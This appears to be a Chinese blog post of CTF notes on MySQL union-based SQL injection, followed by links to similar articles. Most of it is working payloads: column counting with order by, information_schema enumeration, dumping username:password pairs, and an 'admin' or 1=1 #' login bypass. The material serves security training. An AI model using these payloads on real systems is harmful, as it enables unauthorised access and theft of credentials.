【CTF】SQL 注入 总结

最新推荐文章于 2025-10-23 22:15:00 发布
原创 最新推荐文章于 2025-10-23 22:15:00 发布 · 1.1k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #mysql #sql #sql注入 #安全

【CTF】SQL 注入 总结

一、SQL 注入 思路

字段
回显



flag

1.万能密码登陆
2.登陆后,使用联合查询注入
3.爆字段
4.看回显
4.爆数据库
3.爆数据库的表
4.爆出表的列
5.爆出flag

输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23

order by 爆字段,到4报错,有4-1,即3个字段

1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 4 #

union联合查询判断回显,在哪显示数据,就在哪替换命令

1' union select 1,2,3 #

3

爆库

1' union select 1,2,version() #

VERSION

1' union select 1,2,database() #

DATABASE,DATABASE1

爆库的表

只有一个数据库,省事直接相等

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

多个数据库,选择一个

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'

AAA,BBB,CCC

爆库表的列

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BBB' # 

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='CCC' #

id,username,password

读取内容,爆flag

1' union select 1,2,group_concat(id,username,password) from AAA #

id,username,password

1' union select 1,2,group_concat(username,0x3a,password) from AAA#

username:password,username:password

精简版

爆字段

1' order by 1 #
1' order by 2 #
1' order by 3 #

1' order by 1 %23
1' order by 2 %23
1' order by 3 %23

看回显

1' union select 1,2,3 #

爆数据库

1' union select 1,database(),version() #

DATABASE,VERSION

5.爆数据库的表

只有一个数据库,省事直接相等

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

多个数据库,选择一个

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'

AAA,BBB,CCC

6.爆出表的列

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

7.读取内容,爆flag

读AAA表

1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

可以加ASCII码方便区别

1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1

二、SQL 注入 类型

三、技巧

万能密码

admin’ or 1=1 #

常见URL编码

#%23

常用ASCII码

0x3a
:
0x40 @

https://www.litefeel.com/tools/ascii.php

四、工具

1、hackbar

快捷键
Ctrl + Enter 执行

2、sqlmap

3、脚本

五、绕过

未完成待补充整理…

CTFSQL注入(get)
YkingH的博客
07-09 1020
CTF—WEB—SQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 sql注入产生的原因,通常表现在: 不当的类型处理 不安全数据库配置 不合理的查询集处理 不当的错误处理 转义字符处理不合适 多个提交处理不当 信息探测 扫描主机服务信息及服务版本 nmap -sV 靶机ip地址 快速扫描主机全部信息 nmap
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4525
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
CTF-SQL注入总结
SWC0619的博客
03-11 8608
SQL注入总结(一)
干货 | SQL 注入思路总结(非常详细):小白也能跟学,从判断漏洞到获取数据,零基础入门到精通,收藏备用!
Button12138的博客
10-23 1693
SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为称为SQL注入
[BSidesSF2019]blink(CTF-Tools)
热门推荐
寻梦&之璐
05-14 3万+
[BSidesSF2019]blink byte[] v3 = Base64.decode(" data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEB
CTF-SQL注入
weixin_44770698的博客
06-16 5788
CTF-SQL注入题目整理
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 6608
以pikachu靶场练习来学习ctf知识
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6583
关于SQL注入的思维导图可以点开看一下大图
CTF-WEB总结之SQL注入
weixin_41038905的博客
05-01 840
简介 SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。 Union注入 利用内置函数爆数据库信息及相关信息 version() database() user() current_user() @@datadir数据库路径 @@basedir mysql安装路径 @@ver...
CTF-Web学习笔记:SQL注入
Deng7326的博客
07-28 1419
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 617
关于SQL注入的相关CTF笔记
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTF常用sql注入(一)联合注入和宽字节
2301_81040377的博客
07-04 765
给自己总结一下sql注入的常用姿势吧,记录一下学习。
CTF--SQL注入
woshisz0413的博客
11-27 516
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&&与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 3379
sql注入
CTF入门之SQL注入
PolarPeak的博客
12-08 2609
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTF-Web SQL注入
weixin_52182264的博客
04-26 5577
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTF-Web学习笔记——简单SQL注入(一)
weixin_55914379的博客
01-07 1205
SQL注入之简单手注
CTF-10.sql注入(get)
woo233的博客
09-19 668
SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。
ctfsql注入
最新发布
12-23
CTF(Capture The Flag)比赛中,SQL注入是常见且重要的考点。 ### SQL注入基础概念 SQL注入是指攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而改变原本的SQL语句逻辑,达到非法获取、修改或删除数据库...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值